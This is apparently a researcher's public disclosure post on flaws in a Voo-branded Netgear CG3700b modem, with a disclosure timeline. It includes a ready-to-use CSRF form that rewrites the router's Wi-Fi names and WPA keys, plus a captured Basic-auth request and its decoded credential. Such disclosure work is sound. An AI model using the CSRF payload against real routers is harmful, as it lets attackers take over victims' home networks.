Just before I left for America, I found a few Netgear CG3700b vulnerabilities in my Voo branded modem.
As the 90 days have passed since disclosing it to the vendor (see timeline below), it was time for me to publicly disclose my findings and payloads.
CVEs are still pending, but I will add them to this post when I receive them.
Cross-Site Request Forgery (CSRF) on all form POSTs
The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03) allows a (context-dependent) attacker to perform a Cross-Site Request Forgery (CSRF) attack on all configuration setting (/goform/
Before settings:
Example CSRF form:
<form method="POST" name="form0" action="http://192.168.0.1/goform/index" <input type="hidden" name="group_parametrage_wifi" value="active"> <input type="hidden" name="reseau_wifi_name" value="NEWSSID"> <input type="hidden" name="nom_select" value="AUTO-PSK"> <input type="hidden" name="canal" value=0> <input type="hidden" name="mot_de_passe" value="NEWWPAKEY"> <input type="hidden" name="NBandwidth" value=20> <input type="hidden" name="group_parametrage_wifi_an" value="active"> <input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G"> <input type="hidden" name="nom_select_an" value="AUTO-PSK"> <input type="hidden" name="canal_an" value=0> <input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G"> <input type="hidden" name="NBandwidth_an" value=20> <input type="hidden" name="group_fon" value="desactiver"> <input type="hidden" name="buttonApply" value=1> <input type="hidden" name="only_mode" value=0> <input type="hidden" name="selected_ch_an" value=1> </form>
After CSRF:
Insufficient Authentication (OWASP-A2)
This same modem handles authentication via basic authentication over the default (HTTP, non-ssl) connection. This allows an attacker to easily decode the base64 encoded username and password, and authenticate to the router. This only requires an attacker be on the same network as the router, and sniff the clear-text traffic.
Example:
POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE
Screenshot:
root@kali:~# cat voo.txt
dm9vOlBBU1NXT1JE
root@kali:~# base64 --decode voo.txt
voo:PASSWORD
Insufficient Authentication (OWASP-A2)
The Voo Netgear CG3700b also uses the same key for authentication to the administrative console as well as to the wireless by default.
If a WPA2 flaw were to be found that made cracking it simple, the HTTP basic authentication was brute forced (known charset of A-Z and 8 characters), or some other vulnerability found, then this would cause both systems to fail instead of just one.
All in all, a fun weekend, and a few good findings.
The vendor has not gotten back to me regarding a patch for these issues, but I know that some of their other offerings are allegedly less vulnerable.
Disclosure Timeline
22 Jan - discovered vulnerability, initially notified vendor
23 Jan - requested CVE
7 Mar - contacted vendor again, they notified me that they will not fix these issues at this time
20 April - attempted to contact Mitre again to receive CVE
21 April - sent to Full Disclosure
23 April - additional information posted to http://www.doyler.net
26 April - resent to Full Disclosure due to some errors
I will add any additional information to this post as necessary, but you can find the FullDisclosure report here.
He currently serves as a Principal Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.
When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.